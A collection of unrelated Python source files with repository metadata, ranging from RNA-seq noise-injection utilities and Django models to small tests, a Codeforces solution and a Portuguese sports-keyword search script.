labels, y_noise_gen = label_flip(labels, params["label_noise"])
# check if noise is on for RNA-seq data
elif params["noise_gaussian"]:
data = add_gaussian_noise(data, 0, params["std_dev"])
elif params["noise_cluster"]:
data = add_cluster_noise(
data,
loc=0.0,
scale=params["std_dev"],
col_ids=params["feature_col"],
noise_type=params["noise_type"],
row_ids=params["sample_ids"],
y_noise_level=params["label_noise"],
)
elif params["noise_column"]:
data = add_column_noise(
data,
0,
params["std_dev"],
col_ids=params["feature_col"],
noise_type=params["noise_type"],
)
return data, labels
def add_noise(data, labels, params):
# put all the logic under the add_noise switch
if params["add_noise"]:
if params["label_noise"]:
# check if we want noise correlated with a feature
if params["noise_correlated"]:
labels, y_noise_gen = label_flip_correlated(
labels,
params["label_noise"],
data,
params["feature_col"],
params["feature_threshold"],
)
# else add uncorrelated noise
else:
labels, y_noise_gen = label_flip(labels, params["label_noise"])
# check if noise is on for RNA-seq data
elif params["noise_gaussian"]:
data = add_gaussian_noise(data, 0, params["std_dev"])
elif params["noise_cluster"]:
data = add_cluster_noise(
data,
loc=0.0,
scale=params["std_dev"],
col_ids=params["feature_col"],
noise_type=params["noise_type"],
row_ids=params["sample_ids"],
y_noise_level=params["label_noise"],
)
elif params["noise_column"]:
data = add_column_noise(
data,
0,
params["std_dev"],
col_ids=params["feature_col"],
noise_type=params["noise_type"],
)
return data, labels
def label_flip(y_data_categorical, y_noise_level):
flip_count = 0
for i in range(0, y_data_categorical.shape[0]):
if random.random() < y_noise_level:
flip_count += 1
for j in range(y_data_categorical.shape[1]):
y_data_categorical[i][j] = int(not y_data_categorical[i][j])
y_noise_generated = float(flip_count) / float(y_data_categorical.shape[0])
print("Uncorrelated label noise generation:\n")
print(
"Labels flipped on {} samples out of {}: {:06.4f} ({:06.4f} requested)\n".format(
flip_count, y_data_categorical.shape[0], y_noise_generated, y_noise_level
)
)
return y_data_categorical, y_noise_generated
def label_flip_correlated(
y_data_categorical, y_noise_level, x_data, col_ids, threshold
):
for col_id in col_ids:
flip_count = 0
for i in range(0, y_data_categorical.shape[0]):
if x_data[i][col_id] > threshold:
if random.random() < y_noise_level:
print(i, y_data_categorical[i][:])
flip_count += 1
for j in range(y_data_categorical.shape[1]):
y_data_categorical[i][j] = int(not y_data_categorical[i][j])
print(i, y_data_categorical[i][:])
y_noise_generated = float(flip_count) / float(y_data_categorical.shape[0])
print("Correlated label noise generation for feature {:d}:\n".format(col_id))
print(
"Labels flipped on {} samples out of {}: {:06.4f} ({:06.4f} requested)\n".format(
flip_count,
y_data_categorical.shape[0],
y_noise_generated,
y_noise_level,
)
)
return y_data_categorical, y_noise_generated
# Add simple Gaussian noise to RNA seq values, assume normalized x data
def add_gaussian_noise(x_data, loc=0.0, scale=0.5):
print("added gaussian noise")
train_noise = np.random.normal(loc, scale, size=x_data.shape)
x_data = x_data + train_noise
return x_data
# Add simple Gaussian noise to a list of RNA seq values, assume normalized x data
def add_column_noise(x_data, loc=0.0, scale=0.5, col_ids=[0], noise_type="gaussian"):
for col_id in col_ids:
print("added", noise_type, "noise to column ", col_id)
print(x_data[:, col_id].T)
if noise_type == "gaussian":
train_noise = np.random.normal(loc, scale, size=x_data.shape[0])
elif noise_type == "uniform":
train_noise = np.random.uniform(-1.0 * scale, scale, size=x_data.shape[0])
print(train_noise)
x_data[:, col_id] = 1.0 * x_data[:, col_id] + 1.0 * train_noise.T
print(x_data[:, col_id].T)
return x_data
# Add noise to a list of RNA seq values, for a fraction of samples assume normalized x data
def add_cluster_noise(
x_data,
loc=0.0,
scale=0.5,
col_ids=[0],
noise_type="gaussian",
row_ids=[0],
y_noise_level=0.0,
):
# loop over all samples
num_samples = len(row_ids)
flip_count = 0
for row_id in row_ids:
# only perturb a fraction of the samples
if random.random() < y_noise_level:
flip_count += 1
for col_id in col_ids:
print("added", noise_type, "noise to row, column ", row_id, col_id)
print(x_data[row_id, col_id])
if noise_type == "gaussian":
train_noise = np.random.normal(loc, scale)
elif noise_type == "uniform":
train_noise = np.random.uniform(-1.0 * scale, scale)
print(train_noise)
x_data[row_id, col_id] = (
1.0 * x_data[row_id, col_id] + 1.0 * train_noise
)
print(x_data[row_id, col_id])
y_noise_generated = float(flip_count) / float(num_samples)
print(
"Noise added to {} samples out of {}: {:06.4f} ({:06.4f} requested)\n".format(
flip_count, num_samples, y_noise_generated, y_noise_level
)
)
return x_data
| 37.261084 | 94 | 0.571655 | 975 | 7,564 | 4.175385 | 0.118974 | 0.029477 | 0.070744 | 0.041268 | 0.767379 | 0.743552 | 0.679686 | 0.653648 | 0.63547 | 0.610906 | 0 | 0.01439 | 0.329323 | 7,564 | 202 | 95 | 37.445545 | 0.788094 | 0.135907 | 0 | 0.647799 | 0 | 0.018868 | 0.128646 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044025 | false | 0 | 0.012579 | 0 | 0.100629 | 0.100629 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
9c3ecf6bb488053744cb6d6b269e92b05ceaf49c | 249 | py | Python | Strings/Capitalize!.py | Code-With-Aagam/python-hackerrank | 270c75cf2ca30916183c7fe5ca130a64c7a8ed6d | [
"MIT"
] | 3 | 2022-03-05T15:38:26.000Z | 2022-03-09T13:39:30.000Z | Strings/Capitalize!.py | Code-With-Aagam/python-hackerrank | 270c75cf2ca30916183c7fe5ca130a64c7a8ed6d | [
"MIT"
] | null | null | null | Strings/Capitalize!.py | Code-With-Aagam/python-hackerrank | 270c75cf2ca30916183c7fe5ca130a64c7a8ed6d | [
"MIT"
] | null | null | null | def capitalize(string):
# We can't use title() here, consider the case: "123name" -> "123Name", which isn't correct.
for substring in string.split():
string = string.replace(substring, substring.capitalize())
return string | 49.8 | 97 | 0.666667 | 31 | 249 | 5.354839 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030612 | 0.212851 | 249 | 5 | 98 | 49.8 | 0.816327 | 0.361446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
9c4c898411baa86dabf2cedad3099771b16206ac | 271 | py | Python | mainapp/migrations/0086_merge_20180824_1601.py | raeeska/rescuekerala | 649070cd051e0bf2ef54549c96493d5c4c5d89c9 | [
"MIT"
] | 1 | 2018-08-21T15:06:21.000Z | 2018-08-21T15:06:21.000Z | mainapp/migrations/0086_merge_20180824_1601.py | pranavmodx/rescuekerala | dd75a06b191b39ff4bdcd8e42d61c98a6509f052 | [
"MIT"
] | 1 | 2018-08-28T13:26:26.000Z | 2018-08-28T13:26:26.000Z | mainapp/migrations/0086_merge_20180824_1601.py | pranavmodx/rescuekerala | dd75a06b191b39ff4bdcd8e42d61c98a6509f052 | [
"MIT"
] | 5 | 2019-11-07T11:34:56.000Z | 2019-11-07T11:36:00.000Z | # Generated by Django 2.1 on 2018-08-24 10:31
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0084_auto_20180824_1426'),
('mainapp', '0085_auto_20180824_1511'),
]
operations = [
]
| 18.066667 | 47 | 0.649446 | 32 | 271 | 5.3125 | 0.8125 | 0.141176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.221154 | 0.232472 | 271 | 14 | 48 | 19.357143 | 0.596154 | 0.158672 | 0 | 0 | 1 | 0 | 0.265487 | 0.20354 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
9c5289c4fa797410f13bccf543aef70c24a99c61 | 545 | py | Python | lldb/test/API/lang/cpp/typeof/TestTypeOfDeclTypeExpr.py | mkinsner/llvm | 589d48844edb12cd357b3024248b93d64b6760bf | [
"Apache-2.0"
] | 2,338 | 2018-06-19T17:34:51.000Z | 2022-03-31T11:00:37.000Z | lldb/test/API/lang/cpp/typeof/TestTypeOfDeclTypeExpr.py | mkinsner/llvm | 589d48844edb12cd357b3024248b93d64b6760bf | [
"Apache-2.0"
] | 3,740 | 2019-01-23T15:36:48.000Z | 2022-03-31T22:01:13.000Z | lldb/test/API/lang/cpp/typeof/TestTypeOfDeclTypeExpr.py | mkinsner/llvm | 589d48844edb12cd357b3024248b93d64b6760bf | [
"Apache-2.0"
] | 500 | 2019-01-23T07:49:22.000Z | 2022-03-30T02:59:37.000Z | import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
@no_debug_info_test
def test(self):
self.expect_expr("int i; __typeof__(i) j = 1; j", result_type="typeof (i)", result_value="1")
self.expect_expr("int i; typeof(i) j = 1; j", result_type="typeof (i)", result_value="1")
self.expect_expr("int i; decltype(i) j = 1; j", result_type="decltype(i)", result_value="1")
| 36.333333 | 101 | 0.691743 | 83 | 545 | 4.289157 | 0.361446 | 0.078652 | 0.143258 | 0.143258 | 0.410112 | 0.410112 | 0.370787 | 0.370787 | 0.370787 | 0.370787 | 0 | 0.013187 | 0.165138 | 545 | 14 | 102 | 38.928571 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0.211009 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
9c5e49bf065cd64b31071ee824551c783e1a5116 | 1,453 | py | Python | tests/test_maze.py | RhysGrabany/maze-generator | be8c448fb8bd36c1a682224af087bab385516e7b | [
"MIT"
] | null | null | null | tests/test_maze.py | RhysGrabany/maze-generator | be8c448fb8bd36c1a682224af087bab385516e7b | [
"MIT"
] | null | null | null | tests/test_maze.py | RhysGrabany/maze-generator | be8c448fb8bd36c1a682224af087bab385516e7b | [
"MIT"
] | null | null | null | #!usr/bin/python3
import sys, os
sys.path.append(os.path.realpath(os.path.dirname(__file__)+"/.."))
from classes.maze import Maze, Cell
class TestingMaze:
def test_width(self):
maze = Maze(20, 5)
assert maze.getCols() == 20
def test_min_width(self):
maze = Maze(2,2)
assert maze.getCols() == 5
def test_height(self):
maze = Maze(5,50)
assert maze.getRows() == 50
def test_min_height(self):
maze = Maze(2,2)
assert maze.getRows() == 5
def test_maze_name(self):
maze = Maze(5,5)
assert maze.getName() == "MAZE_5x5"
def test_maze_get(self):
maze = Maze(5,5)
assert isinstance(maze[0][0], Cell)
def test_maze_set_name(self):
maze = Maze(5,5)
maze.setName("Testing")
assert maze.getName() == "Testing"
def test_maze_fill_pound(self):
maze = Maze(5,5)
assert maze[0][0].getElement() == '#'
def test_maze_fill_space(self):
maze = Maze(5,5)
assert maze[4][4].getElement() != ' '
def test_maze_image_null(self):
maze = Maze(5,5)
assert maze.getMazeImage() == []
def test_maze_eimage_null(self):
maze = Maze(5,5)
assert maze.getMazeEnhancedImage() == []
def test_maze_len(self):
maze = Maze(5,10)
assert len(maze) == 10
class TestingMazeGenerated:
pass
| 21.686567 | 66 | 0.56435 | 192 | 1,453 | 4.104167 | 0.276042 | 0.106599 | 0.182741 | 0.148477 | 0.27665 | 0.27665 | 0.22335 | 0.071066 | 0 | 0 | 0 | 0.043222 | 0.299381 | 1,453 | 66 | 67 | 22.015152 | 0.730845 | 0.011012 | 0 | 0.209302 | 0 | 0 | 0.018881 | 0 | 0 | 0 | 0 | 0 | 0.27907 | 1 | 0.27907 | false | 0.023256 | 0.046512 | 0 | 0.372093 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
9c5f66a2f0ca4ba171ec371ccf0ee812ca588744 | 346 | py | Python | configs.py | jikkubot/Fotmob-Updates-Bot | edd09c5600ae297a1ce5dce52dea11b86471445b | [
"MIT"
] | 25 | 2021-08-23T20:55:47.000Z | 2022-03-25T09:04:09.000Z | configs.py | lusifernoob/Fotmob-Updates-Bot | ca5cb79760cc0493d81f1d562c203e519cf5dc26 | [
"MIT"
] | 1 | 2021-09-10T19:39:19.000Z | 2022-03-18T15:16:18.000Z | configs.py | lusifernoob/Fotmob-Updates-Bot | ca5cb79760cc0493d81f1d562c203e519cf5dc26 | [
"MIT"
] | 13 | 2021-08-23T20:55:52.000Z | 2021-12-19T11:14:08.000Z | # (c) @AbirHasan2005
import os
from dotenv import load_dotenv
load_dotenv("configs.env")
class Config(object):
API_ID = int(os.environ.get("API_ID", "123"))
API_HASH = os.environ.get("API_HASH", "")
BOT_TOKEN = os.environ.get("BOT_TOKEN", "")
STATUS_UPDATE_CHANNEL_ID = int(os.environ.get("STATUS_UPDATE_CHANNEL_ID", "-100"))
| 24.714286 | 86 | 0.696532 | 52 | 346 | 4.365385 | 0.480769 | 0.15859 | 0.211454 | 0.123348 | 0.14978 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033557 | 0.138728 | 346 | 13 | 87 | 26.615385 | 0.728188 | 0.052023 | 0 | 0 | 0 | 0 | 0.199387 | 0.07362 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
9c6dc2ec12bcdc7cf5d323bb7a17f617da75b93b | 219 | py | Python | A/A 1367 Short Substrings.py | zielman/Codeforces-solutions | 636f11a9eb10939d09d2e50ddc5ec53327d0b7ab | [
"MIT"
] | null | null | null | A/A 1367 Short Substrings.py | zielman/Codeforces-solutions | 636f11a9eb10939d09d2e50ddc5ec53327d0b7ab | [
"MIT"
] | 1 | 2021-05-05T17:05:03.000Z | 2021-05-05T17:05:03.000Z | A/A 1367 Short Substrings.py | zielman/Codeforces-solutions | 636f11a9eb10939d09d2e50ddc5ec53327d0b7ab | [
"MIT"
] | null | null | null | # https://codeforces.com/problemset/problem/1367/A
t = int(input())
for i in range(t):
s = input()
ss = [s[0]]
for i in range(0, len(s)-1, 2):
ss.append((s[i], s[i+1])[1])
print(''.join(ss)) | 24.333333 | 50 | 0.520548 | 40 | 219 | 2.85 | 0.575 | 0.070175 | 0.105263 | 0.192982 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05988 | 0.237443 | 219 | 9 | 51 | 24.333333 | 0.622754 | 0.219178 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
92bdccb96dbb5c109bb2969b899dd510785c9b91 | 4,431 | py | Python | techminer2/column_explorer.py | jdvelasq/techminer2 | ad64a49402749755798a18417c38a7ad10e83bad | [
"MIT"
] | null | null | null | techminer2/column_explorer.py | jdvelasq/techminer2 | ad64a49402749755798a18417c38a7ad10e83bad | [
"MIT"
] | null | null | null | techminer2/column_explorer.py | jdvelasq/techminer2 | ad64a49402749755798a18417c38a7ad10e83bad | [
"MIT"
] | null | null | null | """
Column Explorer
===============================================================================
"""
# import ipywidgets as widgets
# from IPython.display import display
# from ipywidgets import GridspecLayout, Layout
# from .dashboard import document_to_html
# from .utils import load_filtered_documents
# class _App:
# def __init__(self, directory, top_n=100):
# # Data
# self.documents = read_filtered_records(directory)
# columns = sorted(self.documents.columns)
# # Left panel controls
# self.command_panel = [
# widgets.HTML("<hr><b>Column:</b>", layout=Layout(margin="0px 0px 0px 5px")),
# widgets.Dropdown(
# description="",
# value=columns[0],
# options=columns,
# layout=Layout(width="auto"),
# style={"description_width": "130px"},
# ),
# widgets.HTML("<hr><b>Term:</b>", layout=Layout(margin="0px 0px 0px 5px")),
# widgets.Dropdown(
# description="",
# value=None,
# options=[],
# layout=Layout(width="auto"),
# style={"description_width": "130px"},
# ),
# widgets.HTML(
# "<hr><b>Found documents:</b>", layout=Layout(margin="0px 0px 0px 5px")
# ),
# widgets.Select(
# options=[],
# layout=Layout(height="360pt", width="auto"),
# ),
# ]
# # interactive output function
# widgets.interactive_output(
# f=self.interactive_output,
# controls={
# "column": self.command_panel[1],
# "value": self.command_panel[3],
# "article_title": self.command_panel[5],
# },
# )
# # Grid size (Generic)
# self.app_layout = GridspecLayout(
# max(9, len(self.command_panel) + 1), 4, height="700px"
# )
# # Creates command panel (Generic)
# self.app_layout[:, 0] = widgets.VBox(
# self.command_panel,
# layout=Layout(
# margin="10px 8px 5px 10px",
# ),
# )
# # Output area (Generic)
# self.output = widgets.Output() # .add_class("output_color")
# self.app_layout[0:, 1:] = widgets.VBox(
# [self.output],
# layout=Layout(margin="10px 4px 4px 4px", border="1px solid gray"),
# )
# # self.execute()
# def run(self):
# return self.app_layout
# def execute(self):
# with self.output:
# column = self.column
# documents = self.documents.copy()
# documents[column] = documents[column].str.split("; ")
# x = documents.explode(column)
# # populate terms
# all_terms = x[column].copy()
# all_terms = all_terms.dropna()
# all_terms = all_terms.drop_duplicates()
# all_terms = all_terms.sort_values()
# self.command_panel[3].options = all_terms
# #
# # Populate titles
# #
# keyword = self.command_panel[3].value
# s = x[x[column] == keyword]
# s = s[["global_citations", "document_title"]]
# s = s.sort_values(
# ["global_citations", "document_title"], ascending=[False, True]
# )
# s = s[["document_title"]].drop_duplicates()
# self.command_panel[5].options = s["document_title"].tolist()
# #
# # Print info from selected title
# #
# out = self.documents[
# self.documents["document_title"] == self.command_panel[5].value
# ]
# out = out.reset_index(drop=True)
# out = out.iloc[0]
# self.output.clear_output()
# with self.output:
# display(widgets.HTML(document_to_html(out)))
# def interactive_output(self, **kwargs):
# for key in kwargs.keys():
# setattr(self, key, kwargs[key])
# self.execute()
# def column_explorer(directory, top_n=100):
# """
# Column explorer
# :param directory:
# :param top_n:
# :return:
# """
# app = _App(directory, top_n)
# return app.run()
| 30.558621 | 90 | 0.491537 | 418 | 4,431 | 5.062201 | 0.303828 | 0.062382 | 0.075614 | 0.019849 | 0.155009 | 0.134216 | 0.134216 | 0.134216 | 0.134216 | 0.116257 | 0 | 0.019923 | 0.354322 | 4,431 | 144 | 91 | 30.770833 | 0.719678 | 0.937937 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
92c375fabeaa672ec431990d3bd539864c5d8113 | 546 | py | Python | tabcmd/parsers/publish_samples_parser.py | WillAyd/tabcmd | 1ba4a6ce1586b5ec4286aca0edff0fbaa1c69f15 | [
"MIT"
] | null | null | null | tabcmd/parsers/publish_samples_parser.py | WillAyd/tabcmd | 1ba4a6ce1586b5ec4286aca0edff0fbaa1c69f15 | [
"MIT"
] | null | null | null | tabcmd/parsers/publish_samples_parser.py | WillAyd/tabcmd | 1ba4a6ce1586b5ec4286aca0edff0fbaa1c69f15 | [
"MIT"
] | null | null | null | from .global_options import *
class PublishSamplesParser:
"""
Parser to the command publishsamples
"""
@staticmethod
def publish_samples_parser(manager, command):
"""Method to parse publish samples arguments passed by the user"""
publish_samples_parser = manager.include(command)
publish_samples_parser.add_argument('--name', '-n', dest='projectname', required=True,
help='The name of the project.')
set_parent_project_arg(publish_samples_parser)
| 34.125 | 94 | 0.657509 | 58 | 546 | 5.965517 | 0.637931 | 0.202312 | 0.231214 | 0.156069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.254579 | 546 | 15 | 95 | 36.4 | 0.850123 | 0.177656 | 0 | 0 | 0 | 0 | 0.100467 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
92cbca4e71088b5e97ea0542862e94280199e7e0 | 1,275 | py | Python | Website/Members/models.py | sdeusch/django_member_management | ff649ce2845ac6774d6a4187d716349e7eb4a7b8 | [
"Apache-2.0"
] | null | null | null | Website/Members/models.py | sdeusch/django_member_management | ff649ce2845ac6774d6a4187d716349e7eb4a7b8 | [
"Apache-2.0"
] | null | null | null | Website/Members/models.py | sdeusch/django_member_management | ff649ce2845ac6774d6a4187d716349e7eb4a7b8 | [
"Apache-2.0"
] | null | null | null | from django.db import models
class Member(models.Model):
'''A Member is a unique User that can belong to different Accounts (Insurers) '''
first_name=models.CharField(max_length=100)
last_name=models.CharField(max_length=100)
phone_number=models.IntegerField()
client_member_id=models.IntegerField()
def __str__(self):
return self.first_name + ' ' + self.last_name
class Account(models.Model):
''' An instance of this class represents a mapping of a Member to an Account
Uniqueness is guaranteed by a uniqueness constraint in the Meta class
@Todo: If we want to more attributes create new Model class
'''
member=models.ForeignKey(Member, on_delete=models.CASCADE)
account_id = models.IntegerField()
class Meta:
constraints = [
models.UniqueConstraint(name='account_member_uq', fields=['account_id', 'member'])
]
def __str__(self):
return self.member.first_name + ' ' + self.member.last_name + ', Account ' + str(self.account_id)
class MemberCSVFileUpload(models.Model):
'''Our CSV file upload class'''
fname = models.CharField(max_length=500)
file = models.FileField(upload_to='uploads/csv/')
def __str__(self):
self.fname
| 31.875 | 105 | 0.687059 | 164 | 1,275 | 5.152439 | 0.45122 | 0.033136 | 0.063905 | 0.085207 | 0.12071 | 0.073373 | 0 | 0 | 0 | 0 | 0 | 0.008955 | 0.211765 | 1,275 | 39 | 106 | 32.692308 | 0.831841 | 0.239216 | 0 | 0.136364 | 0 | 0 | 0.061224 | 0 | 0 | 0 | 0 | 0.025641 | 0 | 1 | 0.136364 | false | 0 | 0.045455 | 0.090909 | 0.818182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
92d050a54b793ab4f24e2afb78b309d96c4437e7 | 253 | py | Python | tests/integration/empty/python/__main__.py | CDMiXer/Woolloomooloo | 62272b869dbc0190fd20540607b33f3edeba9dce | [
"Apache-2.0",
"MIT"
] | null | null | null | tests/integration/empty/python/__main__.py | CDMiXer/Woolloomooloo | 62272b869dbc0190fd20540607b33f3edeba9dce | [
"Apache-2.0",
"MIT"
] | null | null | null | tests/integration/empty/python/__main__.py | CDMiXer/Woolloomooloo | 62272b869dbc0190fd20540607b33f3edeba9dce | [
"Apache-2.0",
"MIT"
] | null | null | null | # Copyright 2016-2018, Pulumi Corporation. All rights reserved./* Release version [11.0.0-RC.2] - prepare */
/* add verbiage to sweeping and power washing section */
def main():
return None
if __name__ == "__main__":/* Release v1.01 */
main()
| 31.625 | 109 | 0.679842 | 35 | 253 | 4.685714 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077295 | 0.181818 | 253 | 7 | 110 | 36.142857 | 0.714976 | 0.422925 | 0 | 0 | 0 | 0 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
92d880f3124626875e2e13909f732e31f733c0af | 1,791 | py | Python | python/RASCUNHOS/busca_termos.py | raquelmachado4993/omundodanarrativagit | eb8cebcc74514ba8449fab5f9dc5e9a93a826850 | [
"MIT"
] | null | null | null | python/RASCUNHOS/busca_termos.py | raquelmachado4993/omundodanarrativagit | eb8cebcc74514ba8449fab5f9dc5e9a93a826850 | [
"MIT"
] | null | null | null | python/RASCUNHOS/busca_termos.py | raquelmachado4993/omundodanarrativagit | eb8cebcc74514ba8449fab5f9dc5e9a93a826850 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
teste = ["ERA UMA VEZ um rei que vivia num reino distante, com a sua filha pequena, que se chamava Branca de Neve. O rei, como se sentia só, voltou a casar, achando que também seria bom para a sua filha ter uma nova mãe. A nova rainha era uma mulher muito bela mas também muito má, e não gostava de Branca de Neve que, quanto mais crescia, mais bela se tornava. A rainha malvada tinha um espelho mágico, ao qual perguntava, todos os dias: - Espelho meu, espelho meu, haverá mulher mais bela do que eu? E o espelho respondia: - Não minha rainha, és tu a mulher mais bela!"]
resposta = ''.join(teste)
resposta_minuscula = resposta.lower()
pesquisar_esportes = ['futebol', 'vôlei', 'tênis de mesa', 'natação', 'futsal', 'capoeira', 'skate', 'skatismo', 'surf', 'vôlei de praia', 'badminton', 'frescobol', 'judô', 'atletismo', 'críquete', 'basquete', 'hockey na grama', 'hockey no gelo', 'beisebol', 'fórmula 1', 'Rugby', 'futebol americano', 'golfe', 'handebol', 'queimado', 'hipismo', 'ginástica olímpica', 'Triatlo', 'maratona', 'canoagem', 'peteca', 'jiu-jitsu', 'esgrima', 'vale-tudo', 'karatê', 'corrida', 'ciclismo', 'boxe', 'MMA', 'Taekwondo']
print(len(pesquisar_esportes))
# pesquisa = ''.join(pesquisar_esportes)
for i in pesquisar_esportes:
if i in resposta_minuscula:
print ("achei", i)
if i not in resposta_minuscula:
naoachei = "nao achei"
if naoachei == 'nao achei':
print naoachei
# else:
# if i not in resposta_minuscula:
# print ("Nao achei")
# else:
# if i not in resposta_minuscula:
# print ("nao achei")
# for i in pesquisar_esportes:
# if i not in resposta_minuscula:
# print ("nao achei")
# | 51.171429 | 576 | 0.649358 | 243 | 1,791 | 4.740741 | 0.555556 | 0.088542 | 0.082465 | 0.083333 | 0.170139 | 0.170139 | 0.148438 | 0.105903 | 0.105903 | 0.072917 | 0 | 0.001441 | 0.225014 | 1,791 | 35 | 577 | 51.171429 | 0.82853 | 0.150195 | 0 | 0 | 0 | 0.083333 | 0.607025 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
92e040274c2ed03d4c59987a718faff9f8df3508 | 2,456 | py | Python | Incident-Response/Tools/grr/grr/client/grr_response_client/unprivileged/filesystem/filesystem.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 1 | 2021-07-24T17:22:50.000Z | 2021-07-24T17:22:50.000Z | Incident-Response/Tools/grr/grr/client/grr_response_client/unprivileged/filesystem/filesystem.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 2 | 2022-02-28T03:40:31.000Z | 2022-02-28T03:40:52.000Z | Incident-Response/Tools/grr/grr/client/grr_response_client/unprivileged/filesystem/filesystem.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 2 | 2022-02-25T08:34:51.000Z | 2022-03-16T17:29:44.000Z | #!/usr/bin/env python
"""Common code and abstractions for filesystem implementations."""
import abc
from typing import Dict, Optional, Iterable
from grr_response_client.unprivileged.proto import filesystem_pb2
